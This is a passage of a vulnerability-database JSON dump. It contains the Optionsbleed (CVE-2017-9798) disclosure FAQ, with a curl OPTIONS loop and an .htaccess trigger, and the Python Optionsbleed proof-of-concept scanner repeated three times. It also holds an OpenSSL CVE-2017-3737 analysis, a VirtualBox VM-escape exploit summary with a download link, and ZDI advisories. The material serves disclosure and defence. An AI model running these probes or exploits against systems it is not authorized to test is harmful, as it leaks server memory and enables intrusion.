interesting - and dangerous. It suspiciously looked like a \"bleed\"-style bug, which has become a name for bugs where arbitrary pieces of memory are leaked to a potential attacker. However these were random servers on the Internet, so at first I didn't know what software was causing this.\r\n\r\nSometimes HTTP servers send a \"Server\" header telling the software. However one needs to be aware that the \"Server\" header can lie. 
It's quite common to have one HTTP server proxying another. I got all kinds of different \"Server\" headers back, but I very much suspected that these were all from the same bug.\r\n\r\nI tried to contact the affected server operators, but only one of them answered, and he was extremely reluctant to tell me anything about his setup, so that wasn't very helpful either.\r\n\r\nHowever I got one clue: Some of the corrupted headers contained strings that were clearly configuration options from Apache. It seemed quite unlikely that those would show up in the memory of other server software. But I was unable to reproduce anything alike on my own Apache servers. I also tried reading the code that put together the Allow header to see if I can find any clues, but with no success. So without knowing any details I contacted the Apache security team.\r\n\r\nFortunately Apache developer Jacob Champion dug into it and figured out what was going on: Apache supports a configuration directive Limit that allows restricting access to certain HTTP methods to a specific user. And if one sets the [Limit](https://httpd.apache.org/docs/2.4/mod/core.html#limit) directive in an .htaccess file for an HTTP method that's not globally registered in the server then the corruption happens. After that I was able to reproduce it myself. Setting a Limit directive for any invalid HTTP method in an .htaccess file caused a use after free error in the construction of the Allow header which was also [detectable with Address Sanitizer](https://blog.fuzzing-project.org/uploads/optionsbleed-asan.txt). (However ASAN doesn't work reliably due to the memory allocation abstraction done by APR.)\r\n\r\n### FAQ\r\n\r\n#### What's Optionsbleed?\r\n\r\nOptionsbleed is a use after free error in Apache HTTP that causes a corrupted Allow header to be constructed in response to HTTP OPTIONS requests. This can leak pieces of arbitrary memory from the server process that may contain secrets. 
The memory pieces change after multiple requests, so for a vulnerable host an arbitrary number of memory chunks can be leaked.\r\n\r\nThe bug appears if a webmaster tries to use the \"Limit\" directive with an invalid HTTP method.\r\n\r\nExample `.htaccess`:\r\n```\r\n<Limit abcxyz>\r\n</Limit>\r\n```\r\n\r\n#### How prevalent is it?\r\n\r\nScanning the Alexa Top 1 Million revealed 466 hosts with corrupted Allow headers. In theory it's possible that other server software has similar bugs. On the other hand this bug is nondeterministic, so not all vulnerable hosts may have been caught.\r\n\r\n#### So it only happens if you set a quite unusual configuration option?\r\n\r\nThere's an additional risk in shared hosting environments. The corruption is not limited to a single virtual host. One customer of a shared hosting provider could deliberately create an .htaccess file causing this corruption hoping to be able to extract secret data from other hosts on the same system.\r\n\r\n#### I can't reproduce it!\r\n\r\nDue to its nature the bug doesn't appear deterministically. It only seems to appear on busy servers. Sometimes it only appears after multiple requests.\r\n\r\n#### Does it have a CVE?\r\n\r\n[CVE-2017-9798](https://nvd.nist.gov/vuln/detail/CVE-2017-9798).\r\n\r\n#### I'm seeing Allow headers containing HEAD multiple times!\r\n\r\nThis is actually a different Apache bug ([#61207](https://bz.apache.org/bugzilla/show_bug.cgi?id=61207)) that I found during this investigation. It causes HEAD to appear three times instead of once. 
However it's harmless and not a security bug.\r\n\r\nLaunchpad also has [a harmless bug that produces a malformed Allow header](https://bugs.launchpad.net/launchpad/+bug/1717682), using a space-separated list instead of a comma-separated one.\r\n\r\n#### How can I test it?\r\n\r\nA simple way is to use Curl in a loop and send OPTIONS requests:\r\n```\r\nfor i in {1..100}; do curl -sI -X OPTIONS https://www.google.com/|grep -i \"allow:\"; done\r\n```\r\nDepending on the server configuration it may not answer to OPTIONS requests on some URLs. Trying different paths, HTTP versus HTTPS hosts, non-www versus www etc. may lead to different results.\r\n\r\nPlease note that this bug does not show up with the \"*\" OPTIONS target, you need a specific path.\r\n\r\nHere's a [python proof of concept script](https://github.com/hannob/optionsbleed).\r\n\r\n#### What shall I do?\r\n\r\nIf you run an Apache web server you should update. Most distributions should have updated packages by now or very soon. A patch can [be found here](https://svn.apache.org/viewvc/httpd/httpd/branches/2.4.x/server/core.c?r1=1805223&r2=1807754&pathrev=1807754&view=patch). A patch for Apache 2.2 is [available here](https://blog.fuzzing-project.org/uploads/apache-2.2-optionsbleed-backport.patch) (thanks to Thomas Deutschmann for backporting it).\r\n\r\nUnfortunately the communication with the Apache security team wasn't ideal. They were unable to provide a timeline for a coordinated release with a fix, so I decided to define a disclosure date on my own without an upstream fix.\r\n\r\nIf you run an Apache web server in a shared hosting environment that allows users to create .htaccess files you should drop everything you do right now, update immediately and make sure you restart the server afterwards.\r\n\r\n#### Is this as bad as Heartbleed?\r\n\r\nNo. 
Although similar in nature, this bug leaks only small chunks of memory and more importantly only affects a small number of hosts by default.\r\n\r\nIt's still a pretty bad bug, particularly for shared hosting environments.", "published": "2017-09-19T00:00:00", "type": "seebug", "title": "HTTP OPTIONS method can leak Apache's server memory(CVE-2017-9798)\n (Optionsbleed)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9798"], "modified": "2017-09-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96537", "id": "SSV:96537", "sourceData": "\n #!/usr/bin/env python3\r\n\r\n# Optionsbleed proof of concept test\r\n# by Hanno B\u00f6ck\r\n\r\nimport argparse\r\nimport urllib3\r\nimport re\r\n\r\n\r\ndef test_bleed(url, args):\r\n r = pool.request('OPTIONS', url)\r\n try:\r\n allow = str(r.headers[\"Allow\"])\r\n except KeyError:\r\n return False\r\n if allow in dup:\r\n return\r\n dup.append(allow)\r\n if allow == \"\":\r\n print(\"[empty] %s\" % (url))\r\n elif re.match(\"^[a-zA-Z]+(-[a-zA-Z]+)? *(, *[a-zA-Z]+(-[a-zA-Z]+)? *)*$\", allow):\r\n z = [x.strip() for x in allow.split(',')]\r\n if len(z) > len(set(z)):\r\n print(\"[duplicates] %s: %s\" % (url, repr(allow)))\r\n elif args.all:\r\n print(\"[ok] %s: %s\" % (url, repr(allow)))\r\n elif re.match(\"^[a-zA-Z]+(-[a-zA-Z]+)? *( +[a-zA-Z]+(-[a-zA-Z]+)? *)+$\", allow):\r\n print(\"[spaces] %s: %s\" % (url, repr(allow)))\r\n else:\r\n print(\"[bleed] %s: %s\" % (url, repr(allow)))\r\n return True\r\n\r\n\r\nparser = argparse.ArgumentParser(\r\n description='Check for the Optionsbleed vulnerability (CVE-2017-9798).',\r\n epilog=\"Tests server for Optionsbleed bug and other bugs in the allow header.\\n\\n\"\r\n \"Automatically checks http://, https://, http://www. and https://www. 
-\\n\"\r\n \"except if you pass -u/--url (which means by default we check 40 times.)\\n\\n\"\r\n \"Explanation of results:\\n\"\r\n \"[bleed] corrupted header found, vulnerable\\n\"\r\n \"[empty] empty allow header, does not make sense\\n\"\r\n \"[spaces] space-separated method list (should be comma-separated)\\n\"\r\n \"[duplicates] duplicates in list (may be apache bug 61207)\\n\"\r\n \"[ok] normal list found (only shown with -a/--all)\\n\",\r\n formatter_class=argparse.RawTextHelpFormatter)\r\nparser.add_argument('hosttocheck', action='store',\r\n help='The hostname you want to test against')\r\nparser.add_argument('-n', nargs=1, type=int, default=[10],\r\n help='number of tests (default 10)')\r\nparser.add_argument(\"-a\", \"--all\", action=\"store_true\",\r\n help=\"show headers from hosts without problems\")\r\nparser.add_argument(\"-u\", \"--url\", action='store_true',\r\n help=\"pass URL instead of hostname\")\r\nargs = parser.parse_args()\r\nhowoften = int(args.n[0])\r\n\r\ndup = []\r\n\r\n# Note: This disables warnings about the lack of certificate verification.\r\n# Usually this is a bad idea, but for this tool we want to find vulnerabilities\r\n# even if they are shipped with invalid certificates.\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\n\r\npool = urllib3.PoolManager(10, cert_reqs='CERT_NONE')\r\n\r\nif args.url:\r\n test_bleed(args.hosttocheck, args)\r\nelse:\r\n for prefix in ['http://', 'http://www.', 'https://', 'https://www.']:\r\n for i in range(howoften):\r\n try:\r\n if test_bleed(prefix+args.hosttocheck, args) is False:\r\n break\r\n except Exception as e:\r\n pass\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-96537"}, {"lastseen": "2018-01-16T18:25:59", "description": "OpenSSL is a widely used library for SSL and TLS protocol implementation that secures data using encryption and decryption based on cryptographic 
functions. However, a Security Bypass vulnerability \u2013 recently addressed in a patch by the OpenSSL Project \u2013 can be exploited to make vulnerable SSL clients or remote SSL servers send clean application data without encryption.\r\n\r\nThis Security Bypass vulnerability (CVE-2017-3737) is caused by an error when the SSL_read or SSL_write function handles an \"error state\" during an SSL handshake. In this paper the FortiGuard Labs team examines the root cause of this vulnerability.\r\n\r\nThe \"error state\" mechanism was introduced in OpenSSL beginning with version 1.0.2b. It is used to make OpenSSL move into an error state whenever a fatal error occurs during the SSL handshake that would fail if the SSL handshake continued. If the SSL_read or SSL_write function is called directly, it checks the SSL handshake state and performs a new SSL handshake automatically if no handshake has been initiated. If a fatal error occurs during the SSL handshake, OpenSSL moves into the error state and returns an error message to the caller. However, the problem occurs if the caller doesn't check the error state and simply calls the SSL_read or SSL_write function again, because it then sends application data without encryption. \r\n\r\nThe following code snippet was taken from OpenSSL 1.0.2m. 
(Comments added by me have been highlighted.)\r\n\r\n`ssl/s3_pkt.c`:\r\n```\r\n638 int ssl3_write_bytes(SSL *s, int type, const void *buf_, int len)\r\n\r\n639 {\r\n\r\n640 const unsigned char *buf = buf_;\r\n\r\n641 int tot;\r\n\r\n642 unsigned int n, nw;\r\n\r\n643 #if !defined(OPENSSL_NO_MULTIBLOCK) && EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK\r\n\r\n644 unsigned int max_send_fragment;\r\n\r\n645 #endif\r\n\r\n646 SSL3_BUFFER *wb = &(s->s3->wbuf);\r\n\r\n647 int i;\r\n\r\n648 \r\n\r\n649 s->rwstate = SSL_NOTHING;\r\n\r\n650 OPENSSL_assert(s->s3->wnum <= INT_MAX);\r\n\r\n651 tot = s->s3->wnum;\r\n\r\n652 s->s3->wnum = 0;\r\n\r\n653 \r\n\r\n654 if (SSL_in_init(s) && !s->in_handshake) { //checks to see if the SSL handshake state is initiated. The state will be SSL_ST_INIT the first time.\r\n\r\n655 i = s->handshake_func(s); //performs a new SSL handshake if no handshake has been initiated.\r\n\r\n656 if (i < 0)\r\n\r\n657 return (i);\r\n\r\n658 if (i == 0) {\r\n\r\n659 SSLerr(SSL_F_SSL3_WRITE_BYTES, SSL_R_SSL_HANDSHAKE_FAILURE);\r\n\r\n660 return -1;\r\n\r\n661 }\r\n\r\n662 }\r\n```\r\n\r\nssl3_write_bytes() is called by the SSL_write function to send the application data. 
It checks the SSL handshake state and performs the SSL handshake if needed.\r\n\r\n`ssl/s3_clnt.c`:\r\n```\r\n898 int ssl3_get_server_hello(SSL *s)\r\n\r\n899 {\r\n\r\n900 STACK_OF(SSL_CIPHER) *sk;\r\n\r\n901 const SSL_CIPHER *c;\r\n\r\n902 CERT *ct = s->cert;\r\n\r\n903 unsigned char *p, *d;\r\n\r\n904 int i, al = SSL_AD_INTERNAL_ERROR, ok;\r\n\r\n....\r\n\r\n1077 if (i < 0) {\r\n\r\n1078 /* we did not say we would use this cipher */\r\n\r\n1079 al = SSL_AD_ILLEGAL_PARAMETER;\r\n\r\n1080 SSLerr(SSL_F_SSL3_GET_SERVER_HELLO, SSL_R_WRONG_CIPHER_RETURNED);\r\n\r\n1081 goto f_err; //a fatal error occurs\r\n\r\n1082 }\r\n\r\n....\r\n\r\n1170 f_err:\r\n\r\n1171 ssl3_send_alert(s, SSL3_AL_FATAL, al); //sends an SSL alert packet\r\n\r\n1172 err:\r\n\r\n1173 s->state = SSL_ST_ERR; //moves into an error state\r\n\r\n1174 return (-1);\r\n\r\n1175 }\r\n```\r\n\r\nWe used a vulnerable SSL client as a target during the test. During the SSL handshake it received a malformed server hello message from the SSL server controlled by the attacker. 
ssl3_get_server_hello() is called to handle this server hello message and a fatal error occurs, causing OpenSSL to move into an error state by setting s->state from SSL_ST_INIT to SSL_ST_ERR.\r\n\r\n`ssl/s3_pkt.c`:\r\n```\r\n638 int ssl3_write_bytes(SSL *s, int type, const void *buf_, int len)\r\n\r\n639 {\r\n\r\n640 const unsigned char *buf = buf_;\r\n\r\n641 int tot;\r\n\r\n642 unsigned int n, nw;\r\n\r\n643 #if !defined(OPENSSL_NO_MULTIBLOCK) && EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK\r\n\r\n644 unsigned int max_send_fragment;\r\n\r\n645 #endif\r\n\r\n646 SSL3_BUFFER *wb = &(s->s3->wbuf);\r\n\r\n647 int i;\r\n\r\n648 \r\n\r\n649 s->rwstate = SSL_NOTHING;\r\n\r\n650 OPENSSL_assert(s->s3->wnum <= INT_MAX);\r\n\r\n651 tot = s->s3->wnum;\r\n\r\n652 s->s3->wnum = 0;\r\n\r\n653 \r\n\r\n654 if (SSL_in_init(s) && !s->in_handshake) { // SSL_in_init is called again to check the state\r\n```\r\n\r\nIf the vulnerable SSL client doesn't check the error state and call SSL_write function to send application data again, ssl3_write_bytes() is called and uses SSL_in_init() to check the handshake state again.\r\n\r\n`include/openssl/ssl.h`:\r\n```\r\n1749 # define SSL_in_init(a) (SSL_state(a)&SSL_ST_INIT) //s->state is now SSL_ST_ERR, and check returns are false.\r\n```\r\n\r\nThis time the check fails, the SSL handshake is bypassed and the application data will be sent without encryption.\r\n\r\n \r\n\r\nThe following traffic dump shows how the clean application data is sent:\r\n\r\n\r\n\r\n\r\nDuring this attack, the attacker entices the vulnerable SSL client to connect to a malicious SSL server. The SSL client may bypass the handshake process and send the application data without encryption. 
The SSL server may also have the same vulnerability if SSL_read or SSL_write function is called directly.\r\n\r\nNOTE: authentication is NOT required to exploit this vulnerability.\r\n\r\n \r\n\r\n##### IPS Signature\r\nFortiGuard released IPS signature OpenSSL.Handshake.Error.State.Security.Bypass to address this vulnerability.", "published": "2018-01-15T00:00:00", "title": "An Analysis of the OpenSSL SSL Handshake Error State Security Bypass (CVE-2017-3737)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-3737"], "modified": "2018-01-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-97082", "id": "SSV:97082", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}], "exploitpack": [{"lastseen": "2020-04-01T19:04:54", "description": "\nVirtualBox 5.2.6.r120293 - VM Escape", "edition": 1, "published": "2018-08-28T00:00:00", "title": "VirtualBox 5.2.6.r120293 - VM Escape", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-2844"], "modified": "2018-08-28T00:00:00", "id": "EXPLOITPACK:D9276C7F60D6CECB06FC28389FF1B36D", "href": "", "sourceData": "Oracle fixed some of the issues I reported in VirtualBox during the Oracle Critical Patch Update - April 2018. CVE-2018-2844 was an interesting double fetch vulnerability in VirtualBox Video Acceleration (VBVA) feature affecting Linux hosts. VBVA feature works on top of VirtualBox Host-Guest Shared Memory Interface (HGSMI), a shared memory implemented using Video RAM buffer. The VRAM buffer is at physical address 0xE0000000 \n\nI didn't see such optimization in VirtualBox for Windows and OSX. Only Linux hosts are affected. \n\nFind a value in VBoxDD.so (assume as some fake jump table), which during relative address calculation will point into the 16MB shared VRAM buffer. For the proof-of-concept exploit fill the entire VRAM with NOP's and place the shellcode at the final pages of the mapping. 
No ASLR bypass is needed since the jump is relative. \n\nIn the guest, add vboxvideo to /etc/modprobe.d/blacklist.conf. vboxvideo.ko driver has a custom allocator to manage VRAM memory and HGSMI guest side implementations. Blacklisting vboxvideo reduces activity on VRAM and keeps the payload intact. The exploit was tested with Ubuntu Server as Guest and Ubuntu Desktop as host running VirtualBox 5.2.6.r120293.\n\nThe proof-of-concept exploit code with process continuation and connect back over network can be found at virtualbox-cve-2018-2844\n\nhttps://www.voidsecurity.in/2018/08/from-compiler-optimization-to-code.html\nhttps://github.com/renorobert/virtualbox-cve-2018-2844\n\nDownload: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45372.zip", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:03", "description": "\nApache 2.2.34 2.4.27 - OPTIONS Memory Leak", "edition": 1, "published": "2017-09-18T00:00:00", "title": "Apache 2.2.34 2.4.27 - OPTIONS Memory Leak", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9798"], "modified": "2017-09-18T00:00:00", "id": "EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D", "href": "", "sourceData": "#!/usr/bin/env python3\n\n# Optionsbleed proof of concept test\n# by Hanno B\u00f6ck\n\nimport argparse\nimport urllib3\nimport re\n\n\ndef test_bleed(url, args):\n r = pool.request('OPTIONS', url)\n try:\n allow = str(r.headers[\"Allow\"])\n except KeyError:\n return False\n if allow in dup:\n return\n dup.append(allow)\n if allow == \"\":\n print(\"[empty] %s\" % (url))\n elif re.match(\"^[a-zA-Z]+(-[a-zA-Z]+)? *(, *[a-zA-Z]+(-[a-zA-Z]+)? *)*$\", allow):\n z = [x.strip() for x in allow.split(',')]\n if len(z) > len(set(z)):\n print(\"[duplicates] %s: %s\" % (url, repr(allow)))\n elif args.all:\n print(\"[ok] %s: %s\" % (url, repr(allow)))\n elif re.match(\"^[a-zA-Z]+(-[a-zA-Z]+)? *( +[a-zA-Z]+(-[a-zA-Z]+)? 
*)+$\", allow):\n print(\"[spaces] %s: %s\" % (url, repr(allow)))\n else:\n print(\"[bleed] %s: %s\" % (url, repr(allow)))\n return True\n\n\nparser = argparse.ArgumentParser(\n description='Check for the Optionsbleed vulnerability (CVE-2017-9798).',\n epilog=\"Tests server for Optionsbleed bug and other bugs in the allow header.\\n\\n\"\n \"Autmatically checks http://, https://, http://www. and https://www. -\\n\"\n \"except if you pass -u/--url (which means by default we check 40 times.)\\n\\n\"\n \"Explanation of results:\\n\"\n \"[bleed] corrupted header found, vulnerable\\n\"\n \"[empty] empty allow header, does not make sense\\n\"\n \"[spaces] space-separated method list (should be comma-separated)\\n\"\n \"[duplicates] duplicates in list (may be apache bug 61207)\\n\"\n \"[ok] normal list found (only shown with -a/--all)\\n\",\n formatter_class=argparse.RawTextHelpFormatter)\nparser.add_argument('hosttocheck', action='store',\n help='The hostname you want to test against')\nparser.add_argument('-n', nargs=1, type=int, default=[10],\n help='number of tests (default 10)')\nparser.add_argument(\"-a\", \"--all\", action=\"store_true\",\n help=\"show headers from hosts without problems\")\nparser.add_argument(\"-u\", \"--url\", action='store_true',\n help=\"pass URL instead of hostname\")\nargs = parser.parse_args()\nhowoften = int(args.n[0])\n\ndup = []\n\n# Note: This disables warnings about the lack of certificate verification.\n# Usually this is a bad idea, but for this tool we want to find vulnerabilities\n# even if they are shipped with invalid certificates.\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\npool = urllib3.PoolManager(10, cert_reqs='CERT_NONE')\n\nif args.url:\n test_bleed(args.hosttocheck, args)\nelse:\n for prefix in ['http://', 'http://www.', 'https://', 'https://www.']:\n for i in range(howoften):\n try:\n if test_bleed(prefix+args.hosttocheck, args) is False:\n break\n except Exception as e:\n pass", "cvss": 
{"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2018-10-07T14:32:23", "description": "VirtualBox 5.2.6.r120293 - VM Escape. Local exploit for Linux platform", "published": "2018-08-28T00:00:00", "type": "exploitdb", "title": "VirtualBox 5.2.6.r120293 - VM Escape", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-2844"], "modified": "2018-08-28T00:00:00", "id": "EDB-ID:45372", "href": "https://www.exploit-db.com/exploits/45372/", "sourceData": "Oracle fixed some of the issues I reported in VirtualBox during the Oracle Critical Patch Update - April 2018. CVE-2018-2844 was an interesting double fetch vulnerability in VirtualBox Video Acceleration (VBVA) feature affecting Linux hosts. VBVA feature works on top of VirtualBox Host-Guest Shared Memory Interface (HGSMI), a shared memory implemented using Video RAM buffer. The VRAM buffer is at physical address 0xE0000000 \r\n\r\nI didn't see such optimization in VirtualBox for Windows and OSX. Only Linux hosts are affected. \r\n\r\nFind a value in VBoxDD.so (assume as some fake jump table), which during relative address calculation will point into the 16MB shared VRAM buffer. For the proof-of-concept exploit fill the entire VRAM with NOP's and place the shellcode at the final pages of the mapping. No ASLR bypass is needed since the jump is relative. \r\n\r\nIn the guest, add vboxvideo to /etc/modprobe.d/blacklist.conf. vboxvideo.ko driver has a custom allocator to manage VRAM memory and HGSMI guest side implementations. Blacklisting vboxvideo reduces activity on VRAM and keeps the payload intact. 
The exploit was tested with Ubuntu Server as Guest and Ubuntu Desktop as host running VirtualBox 5.2.6.r120293.\r\n\r\nThe proof-of-concept exploit code with process continuation and connect back over network can be found at virtualbox-cve-2018-2844\r\n\r\nhttps://www.voidsecurity.in/2018/08/from-compiler-optimization-to-code.html\r\nhttps://github.com/renorobert/virtualbox-cve-2018-2844\r\n\r\nDownload: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45372.zip", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/45372/"}, {"lastseen": "2017-09-18T19:03:27", "description": "Apache - HTTP OPTIONS Memory Leak. CVE-2017-9798. Webapps exploit for Linux platform", "published": "2017-09-18T00:00:00", "type": "exploitdb", "title": "Apache - HTTP OPTIONS Memory Leak", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9798"], "modified": "2017-09-18T00:00:00", "id": "EDB-ID:42745", "href": "https://www.exploit-db.com/exploits/42745/", "sourceData": "#!/usr/bin/env python3\r\n\r\n# Optionsbleed proof of concept test\r\n# by Hanno B\u00f6ck\r\n\r\nimport argparse\r\nimport urllib3\r\nimport re\r\n\r\n\r\ndef test_bleed(url, args):\r\n r = pool.request('OPTIONS', url)\r\n try:\r\n allow = str(r.headers[\"Allow\"])\r\n except KeyError:\r\n return False\r\n if allow in dup:\r\n return\r\n dup.append(allow)\r\n if allow == \"\":\r\n print(\"[empty] %s\" % (url))\r\n elif re.match(\"^[a-zA-Z]+(-[a-zA-Z]+)? *(, *[a-zA-Z]+(-[a-zA-Z]+)? *)*$\", allow):\r\n z = [x.strip() for x in allow.split(',')]\r\n if len(z) > len(set(z)):\r\n print(\"[duplicates] %s: %s\" % (url, repr(allow)))\r\n elif args.all:\r\n print(\"[ok] %s: %s\" % (url, repr(allow)))\r\n elif re.match(\"^[a-zA-Z]+(-[a-zA-Z]+)? *( +[a-zA-Z]+(-[a-zA-Z]+)? 
*)+$\", allow):\r\n print(\"[spaces] %s: %s\" % (url, repr(allow)))\r\n else:\r\n print(\"[bleed] %s: %s\" % (url, repr(allow)))\r\n return True\r\n\r\n\r\nparser = argparse.ArgumentParser(\r\n description='Check for the Optionsbleed vulnerability (CVE-2017-9798).',\r\n epilog=\"Tests server for Optionsbleed bug and other bugs in the allow header.\\n\\n\"\r\n \"Autmatically checks http://, https://, http://www. and https://www. -\\n\"\r\n \"except if you pass -u/--url (which means by default we check 40 times.)\\n\\n\"\r\n \"Explanation of results:\\n\"\r\n \"[bleed] corrupted header found, vulnerable\\n\"\r\n \"[empty] empty allow header, does not make sense\\n\"\r\n \"[spaces] space-separated method list (should be comma-separated)\\n\"\r\n \"[duplicates] duplicates in list (may be apache bug 61207)\\n\"\r\n \"[ok] normal list found (only shown with -a/--all)\\n\",\r\n formatter_class=argparse.RawTextHelpFormatter)\r\nparser.add_argument('hosttocheck', action='store',\r\n help='The hostname you want to test against')\r\nparser.add_argument('-n', nargs=1, type=int, default=[10],\r\n help='number of tests (default 10)')\r\nparser.add_argument(\"-a\", \"--all\", action=\"store_true\",\r\n help=\"show headers from hosts without problems\")\r\nparser.add_argument(\"-u\", \"--url\", action='store_true',\r\n help=\"pass URL instead of hostname\")\r\nargs = parser.parse_args()\r\nhowoften = int(args.n[0])\r\n\r\ndup = []\r\n\r\n# Note: This disables warnings about the lack of certificate verification.\r\n# Usually this is a bad idea, but for this tool we want to find vulnerabilities\r\n# even if they are shipped with invalid certificates.\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\n\r\npool = urllib3.PoolManager(10, cert_reqs='CERT_NONE')\r\n\r\nif args.url:\r\n test_bleed(args.hosttocheck, args)\r\nelse:\r\n for prefix in ['http://', 'http://www.', 'https://', 'https://www.']:\r\n for i in range(howoften):\r\n try:\r\n if 
test_bleed(prefix+args.hosttocheck, args) is False:\r\n break\r\n except Exception as e:\r\n pass", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42745/"}], "zdi": [{"lastseen": "2020-06-22T11:40:37", "bulletinFamily": "info", "cvelist": ["CVE-2018-2860"], "description": "This vulnerability allows remote attackers to escalate privileges on vulnerable installations of Oracle VirtualBox. An attacker must first obtain the ability to execute low-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the handling of HGCM. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the hypervisor.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-07-26T00:00:00", "id": "ZDI-18-783", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-783/", "title": "(Pwn2Own) Oracle Virtualbox HGCM Out-Of-Bounds Write Privilege Escalation Vulnerability ", "type": "zdi", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-22T11:40:35", "bulletinFamily": "info", "cvelist": ["CVE-2018-2860"], "description": "This vulnerability allows local attackers to disclose sensitive information on vulnerable installations of Oracle VirtualBox. An attacker must first obtain the ability to execute low-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the handling of HGCM. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. 
An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the hypervisor.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-07-26T00:00:00", "id": "ZDI-18-782", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-782/", "title": "(Pwn2Own) Oracle Virtualbox HGCM Out-Of-Bounds Read Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-22T11:40:55", "bulletinFamily": "info", "cvelist": ["CVE-2018-2835"], "description": "This vulnerability allows local attackers to execute arbitrary code on vulnerable installations of Oracle VirtualBox. An attacker must first obtain the ability to execute low-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the crStateTrackMatrixNV method. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to escalate privileges and execute code under the context of the hypervisor.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-04-18T00:00:00", "id": "ZDI-18-303", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-303/", "title": "Oracle VirtualBox crStateTrackMatrixNV Out-Of-Bounds Write Privilege Escalation Vulnerability", "type": "zdi", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-22T11:41:47", "bulletinFamily": "info", "cvelist": ["CVE-2018-2837"], "description": "This vulnerability allows local attackers to execute arbitrary code on vulnerable installations of Oracle VirtualBox. An attacker must first obtain the ability to execute low-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the crStateProgramParameters4dvNV method. 
The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to escalate privileges and execute code under the context of the hypervisor.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-04-18T00:00:00", "id": "ZDI-18-305", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-305/", "title": "Oracle VirtualBox crStateProgramParameters4dvNV Out-Of-Bounds Write Privilege Escalation Vulnerability", "type": "zdi", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-22T11:41:01", "bulletinFamily": "info", "cvelist": ["CVE-2018-2836"], "description": "This vulnerability allows local attackers to execute arbitrary code on vulnerable installations of Oracle VirtualBox. An attacker must first obtain the ability to execute low-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the crUnpackExtendLockArraysEXT method. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to escalate privileges and execute code under the context of the hypervisor.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-04-18T00:00:00", "id": "ZDI-18-304", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-304/", "title": "Oracle VirtualBox crUnpackExtendLockArraysEXT Out-Of-Bounds Write Privilege Escalation Vulnerability", "type": "zdi", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:45:01", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. 
